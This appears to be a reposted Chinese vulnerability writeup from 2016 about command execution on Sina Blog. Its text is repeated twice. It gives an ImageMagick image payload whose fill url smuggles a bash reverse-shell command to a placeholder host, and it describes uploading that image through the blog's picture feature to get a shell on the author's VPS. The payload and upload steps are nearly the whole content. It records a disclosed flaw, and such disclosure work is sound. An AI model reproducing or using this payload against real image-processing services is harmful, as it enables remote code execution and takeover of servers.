首页 | 电脑 | 安全 | 网站安全

新浪博客命令执行

2016年05月10日 原文

新浪博客命令执行(凑个热闹)

新浪博客发图片的地方

 

1.png

 

选择图片

图片内容为

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/x.x.x.x/80 0>&1")'

pop graphic-context

 

2.png

 

一步一步点到保存成功

 

3.png

 

开始上传

 

4.png

 

 

5.png

 

shell躺在了vps上

 

result.png

 

新浪博客发图片的地方

 

1.png

 

选择图片

图片内容为

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/x.x.x.x/80 0>&1")'

pop graphic-context

 

2.png

 

一步一步点到保存成功

 

3.png

 

开始上传

 

4.png

 

 

5.png

 

shell躺在了vps上

 

result.png

 

相关链接